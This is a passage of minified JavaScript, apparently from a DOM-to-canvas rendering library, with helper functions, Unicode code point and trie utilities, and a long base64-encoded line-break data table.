7:kt=ge.ops.pop(),ge.trys.pop();continue;default:if(!(tt=(tt=ge.trys).length>0&&tt[tt.length-1])&&(6===kt[0]||2===kt[0])){ge=0;continue}if(3===kt[0]&&(!tt||kt[1]>tt[0]&&kt[1]<tt[3])){ge.label=kt[1];break}if(6===kt[0]&&ge.label<tt[1]){ge.label=tt[1],tt=kt;break}if(tt&&ge.label<tt[2]){ge.label=tt[2],ge.ops.push(kt);break}tt[2]&&ge.ops.pop(),ge.trys.pop();continue}kt=ce.call(fe,ge)}catch(Lt){kt=[6,Lt],je=0}finally{_e=tt=0}if(5&kt[0])throw kt[1];return{value:kt[0]?kt[1]:void 0,done:!0}}([kt,Lt])}}}function ae(fe,ce,ge){if(ge||2===arguments.length)for(var tt,_e=0,je=ce.length;_e<je;_e++)(tt||!(_e in ce))&&(tt||(tt=Array.prototype.slice.call(ce,0,_e)),tt[_e]=ce[_e]);return fe.concat(tt||ce)}for(var I=function(){function fe(ce,ge,_e,je){this.left=ce,this.top=ge,this.width=_e,this.height=je}return fe.prototype.add=function(ce,ge,_e,je){return new fe(this.left+ce,this.top+ge,this.width+_e,this.height+je)},fe.fromClientRect=function(ce,ge){return new fe(ge.left+ce.windowBounds.left,ge.top+ce.windowBounds.top,ge.width,ge.height)},fe.fromDOMRectList=function(ce,ge){var _e=Array.from(ge).find(function(je){return 0!==je.width});return _e?new fe(_e.left+ce.windowBounds.left,_e.top+ce.windowBounds.top,_e.width,_e.height):fe.EMPTY},fe.EMPTY=new fe(0,0,0,0),fe}(),Q=function(fe,ce){return I.fromClientRect(fe,ce.getBoundingClientRect())},E=function(fe){for(var ce=[],ge=0,_e=fe.length;ge<_e;){var je=fe.charCodeAt(ge++);if(je>=55296&&je<=56319&&ge<_e){var tt=fe.charCodeAt(ge++);56320==(64512&tt)?ce.push(((1023&je)<<10)+(1023&tt)+65536):(ce.push(je),ge--)}else ce.push(je)}return ce},g=function(){for(var fe=[],ce=0;ce<arguments.length;ce++)fe[ce]=arguments[ce];if(String.fromCodePoint)return String.fromCodePoint.apply(String,fe);var ge=fe.length;if(!ge)return"";for(var _e=[],je=-1,tt="";++je<ge;){var dt=fe[je];dt<=65535?_e.push(dt):_e.push(55296+((dt-=65536)>>10),dt%1024+56320),(je+1===ge||_e.length>16384)&&(tt+=String.fromCharCode.apply(String,_e),_e.length=0)}return tt},b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_="undefined"==typeof Uint8Array?[]:new Uint8Array(256),y=0;y<b.length;y++)_[b.charCodeAt(y)]=y;for(var M="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",p="undefined"==typeof Uint8Array?[]:new Uint8Array(256),D=0;D<M.length;D++)p[M.charCodeAt(D)]=D;for(var X=function(fe,ce,ge){return fe.slice?fe.slice(ce,ge):new Uint16Array(Array.prototype.slice.call(fe,ce,ge))},R=function(){function fe(ce,ge,_e,je,tt,dt){this.initialValue=ce,this.errorValue=ge,this.highStart=_e,this.highValueIndex=je,this.index=tt,this.data=dt}return fe.prototype.get=function(ce){var ge;if(ce>=0){if(ce<55296||ce>56319&&ce<=65535)return this.data[ge=((ge=this.index[ce>>5])<<2)+(31&ce)];if(ce<=65535)return this.data[ge=((ge=this.index[2048+(ce-55296>>5)])<<2)+(31&ce)];if(ce<this.highStart)return ge=this.index[ge=2080+(ce>>11)],this.data[ge=((ge=this.index[ge+=ce>>5&63])<<2)+(31&ce)];if(ce<=1114111)return this.data[this.highValueIndex]}return this.errorValue},fe}(),J="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",Z="undefined"==typeof Uint8Array?[]:new Uint8Array(256),ue=0;ue<J.length;ue++)Z[J.charCodeAt(ue)]=ue;var ge,_e,je,dt,_t,me=10,Ge=13,ht=15,lt=17,ft=18,xe=19,We=20,Je=21,Oe=22,Le=24,$e=25,st=26,xt=27,pt=28,Wi=30,zt=32,pa=33,Jt=34,Gt=35,jt=37,qt=38,Qn=39,Kt=40,Bo=42,ii=[9001,65288],Pt="\xd7",Ho=(ge=function(fe){var _e,tt,dt,_t,gt,ce=.75*fe.length,ge=fe.length,je=0;"="===fe[fe.length-1]&&(ce--,"="===fe[fe.length-2]&&ce--);var kt="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array&&void 0!==Uint8Array.prototype.slice?new ArrayBuffer(ce):new Array(ce),Lt=Array.isArray(kt)?kt:new Uint8Array(kt);for(_e=0;_e<ge;_e+=4)tt=p[fe.charCodeAt(_e)],dt=p[fe.charCodeAt(_e+1)],_t=p[fe.charCodeAt(_e+2)],gt=p[fe.charCodeAt(_e+3)],Lt[je++]=tt<<2|dt>>4,Lt[je++]=(15&dt)<<4|_t>>2,Lt[je++]=(3&_t)<<6|63&gt;return kt}("KwAAAAAAAAAACA4AUD0AADAgAAACAAAAAAAIABAAGABAAEgAUABYAGAAaABgAGgAYgBqAF8AZwBgAGgAcQB5AHUAfQCFAI0AlQCdAKIAqgCyALoAYABoAGAAaABgAGgAwgDKAGAAaADGAM4A0wDbAOEA6QDxAPkAAQEJAQ8BFwF1AH0AHAEkASwBNAE6AUIBQQFJAVEBWQFhAWgBcAF4ATAAgAGGAY4BlQGXAZ8BpwGvAbUBvQHFAc0B0wHbAeMB6wHxAfkBAQIJAvEBEQIZAiECKQIxAjgCQAJGAk4CVgJeAmQCbAJ0AnwCgQKJApECmQKgAqgCsAK4ArwCxAIwAMwC0wLbAjAA4wLrAvMC+AIAAwcDDwMwABcDHQMlAy0DNQN1AD0DQQNJA0kDSQNRA1EDVwNZA1kDdQB1AGEDdQBpA20DdQN1AHsDdQCBA4kDkQN1AHUAmQOhA3UAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AKYDrgN1AHUAtgO+A8YDzgPWAxcD3gPjA+sD8wN1AHUA+wMDBAkEdQANBBUEHQQlBCoEFwMyBDgEYABABBcDSARQBFgEYARoBDAAcAQzAXgEgASIBJAEdQCXBHUAnwSnBK4EtgS6BMIEyAR1AHUAdQB1AHUAdQCVANAEYABgAGAAYABgAGAAYABgANgEYADcBOQEYADsBPQE/AQEBQwFFAUcBSQFLAU0BWQEPAVEBUsFUwVbBWAAYgVgAGoFcgV6BYIFigWRBWAAmQWfBaYFYABgAGAAYABgAKoFYACxBbAFuQW6BcEFwQXHBcEFwQXPBdMF2wXjBeoF8gX6BQIGCgYSBhoGIgYqBjIGOgZgAD4GRgZMBmAAUwZaBmAAYABgAGAAYABgAGAAYABgAGAAYABgAGIGYABpBnAGYABgAGAAYABgAGAAYABgAGAAYAB4Bn8GhQZgAGAAYAB1AHcDFQSLBmAAYABgAJMGdQA9A3UAmwajBqsGqwaVALMGuwbDBjAAywbSBtIG1QbSBtIG0gbSBtIG0gbdBuMG6wbzBvsGAwcLBxMHAwcbByMHJwcsBywHMQcsB9IGOAdAB0gHTgfSBkgHVgfSBtIG0gbSBtIG0gbSBtIG0gbSBiwHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAdgAGAALAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAdbB2MHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsB2kH0gZwB64EdQB1AHUAdQB1AHUAdQB1AHUHfQdgAIUHjQd1AHUAlQedB2AAYAClB6sHYACzB7YHvgfGB3UAzgfWBzMB3gfmB1EB7gf1B/0HlQENAQUIDQh1ABUIHQglCBcDLQg1CD0IRQhNCEEDUwh1AHUAdQBbCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIaQhjCGQIZQhmCGcIaAhpCGMIZAhlCGYIZwhoCGkIYwhkCGUIZghnCGgIcAh3CHoIMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwAIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIgggwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAALAcsBywHLAcsBywHLAcsBywHLAcsB4oILAcsB44I0gaWCJ4Ipgh1AHUAqgiyCHUAdQB1AHUAdQB1AHUAdQB1AHUAtwh8AXUAvwh1AMUIyQjRCNkI4AjoCHUAdQB1AO4I9gj+CAYJDgkTCS0HGwkjCYIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiCCIIIggiAAIAAAAFAAYABgAGIAXwBgAHEAdQBFAJUAogCyAKAAYABgAEIA4ABGANMA4QDxAMEBDwE1AFwBLAE6AQEBUQF4QkhCmEKoQrhCgAHIQsAB0MLAAcABwAHAAeDC6ABoAHDCwMMAAcABwAHAAdDDGMMAAcAB6MM4wwjDWMNow3jDaABoAGgAaABoAGgAaABoAGgAaABoAGgAaABoAGgAaABoAGgAaABoAEjDqABWw6bDqABpg6gAaABoAHcDvwOPA+gAaABfA/8DvwO/A78DvwO/A78DvwO/A78DvwO/A78DvwO/A78DvwO/A78DvwO/A78DvwO/A78DvwO/A78DpcPAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcABwAHAAcAB9cPKwkyCToJMAB1AHUAdQBCCUoJTQl1AFUJXAljCWcJawkwADAAMAAwAHMJdQB2CX4JdQCECYoJjgmWCXUAngkwAGAAYABxAHUApgn3A64JtAl1ALkJdQDACTAAMAAwADAAdQB1AHUAdQB1AHUAdQB1AHUAowYNBMUIMAAwADAAMADICcsJ0wnZCRUE4QkwAOkJ8An4CTAAMAB1AAAKvwh1AAgKDwoXCh8KdQAwACcKLgp1ADYKqAmICT4KRgowADAAdQB1AE4KMAB1AFYKdQBeCnUAZQowADAAMAAwADAAMAAwADAAMAAVBHUAbQowADAAdQC5CXUKMAAwAHwBxAijBogEMgF9CoQKiASMCpQKmgqIBKIKqgquCogEDQG2Cr4KxgrLCjAAMADTCtsKCgHjCusK8Qr5CgELMAAwADAAMAB1AIsECQsRC3UANAEZCzAAMAAwADAAMAB1ACELKQswAHUANAExCzkLdQBBC0kLMABRC1kLMAAwADAAMAAwADAAdQBhCzAAMAAwAGAAYABpC3ELdwt/CzAAMACHC4sLkwubC58Lpwt1AK4Ltgt1APsDMAAwADAAMAAwADAAMAAwAL4LwwvLC9IL1wvdCzAAMADlC+kL8Qv5C/8LSQswADAAMAAwADAAMAAwADAAMAAHDDAAMAAwADAAMAAODBYMHgx1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1ACYMMAAwADAAdQB1AHUALgx1AHUAdQB1AHUAdQA2DDAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwAHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AD4MdQBGDHUAdQB1AHUAdQB1AEkMdQB1AHUAdQB1AFAMMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwAHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQBYDHUAdQB1AF8MMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUA+wMVBGcMMAAwAHwBbwx1AHcMfwyHDI8MMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAYABgAJcMMAAwADAAdQB1AJ8MlQClDDAAMACtDCwHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsB7UMLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHdQB1AHUAdQB1AHUAdQB1AHUAdQB1AHUAdQB1AA0EMAC9DDAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAsBywHLAcsBywHLAcsBywHLQcwAMEMyAwsBywHLAcsBywHLAcsBywHLAcsBywHzAwwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwAHUAdQB1ANQM2QzhDDAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMABgAGAAYABgAGAAYABgAOkMYADxDGAA+AwADQYNYABhCWAAYAAODTAAMAAwADAAFg1gAGAAHg37AzAAMAAwADAAYABgACYNYAAsDTQNPA1gAEMNPg1LDWAAYABgAGAAYABgAGAAYABgAGAAUg1aDYsGVglhDV0NcQBnDW0NdQ15DWAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAYABgAGAAlQCBDZUAiA2PDZcNMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAnw2nDTAAMAAwADAAMAAwAHUArw23DTAAMAAwADAAMAAwADAAMAAwADAAMAB1AL8NMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAB1AHUAdQB1AHUAdQDHDTAAYABgAM8NMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAA1w11ANwNMAAwAD0B5A0wADAAMAAwADAAMADsDfQN/A0EDgwOFA4wABsOMAAwADAAMAAwADAAMAAwANIG0gbSBtIG0gbSBtIG0gYjDigOwQUuDsEFMw7SBjoO0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIGQg5KDlIOVg7SBtIGXg5lDm0OdQ7SBtIGfQ6EDooOjQ6UDtIGmg6hDtIG0gaoDqwO0ga0DrwO0gZgAGAAYADEDmAAYAAkBtIGzA5gANIOYADaDokO0gbSBt8O5w7SBu8O0gb1DvwO0gZgAGAAxA7SBtIG0gbSBtIGYABgAGAAYAAED2AAsAUMD9IG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIGFA8sBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAccD9IGLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHJA8sBywHLAcsBywHLAccDywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywPLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAc0D9IG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIGLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAccD9IG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIGFA8sBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHLAcsBywHPA/SBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gbSBtIG0gYUD0QPlQCVAJUAMAAwADAAMACVAJUAlQCVAJUAlQCVAEwPMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAA//8EAAQABAAEAAQABAAEAAQABAANAAMAAQABAAIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQACgATABcAHgAbABoAHgAXABYAEgAeABsAGAAPABgAHABLAEsASwBLAEsASwBLAEsASwBLABgAGAAeAB4AHgATAB4AUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQABYAGwASAB4AHgAeAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAWAA0AEQAeAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAAQABAAEAAQABAAFAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAJABYAGgAbABsAGwAeAB0AHQAeAE8AFwAeAA0AHgAeABoAGwBPAE8ADgBQAB0AHQAdAE8ATwAXAE8ATwBPABYAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAB0AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAdAFAAUABQAFAAUABQAFAAUAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAFAAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAeAB4AHgAeAFAATwBAAE8ATwBPAEAATwBQAFAATwBQAB4AHgAeAB4AHgAeAB0AHQAdAB0AHgAdAB4ADgBQAFAAUABQAFAAHgAeAB4AHgAeAB4AHgBQAB4AUAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAJAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAkACQAJAAkACQAJAAkABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAeAB4AHgAeAFAAHgAeAB4AKwArAFAAUABQAFAAGABQACsAKwArACsAHgAeAFAAHgBQAFAAUAArAFAAKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4ABAAEAAQABAAEAAQABAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAUAAeAB4AHgAeAB4AHgBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAYAA0AKwArAB4AHgAbACsABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQADQAEAB4ABAAEAB4ABAAEABMABAArACsAKwArACsAKwArACsAVgBWAFYAVgBWAFYAVgBWAFYAVgBWAFYAVgBWAFYAVgBWAFYAVgBWAFYA